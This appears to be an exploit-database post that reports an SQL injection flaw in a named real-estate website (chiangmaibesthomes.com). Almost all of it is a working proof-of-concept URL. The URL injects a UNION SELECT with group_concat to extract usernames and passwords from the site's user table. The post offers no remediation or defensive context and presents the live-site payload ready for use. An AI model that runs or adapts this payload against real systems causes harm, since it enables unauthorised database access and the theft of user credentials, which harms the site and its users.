-------------------------------------------------------------*
#Exploit Title: chiangmaibesthomes - SQL Injection vulnerability
#Date: 2020-10-02
#Exploit Author: ERa
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Demo :
http://www.chiangmaibesthomes.com/detail-condo-sale.php?id=-641%27%20union%20select%201,2,group_concat(user_name,0x3a,user_pass),4,5%20from%20tb_user--+
-------------------------------------------------------------*
#Discovered by: ERa
#Email: era_reborn@yahoo.com
-------------------------------------------------------------*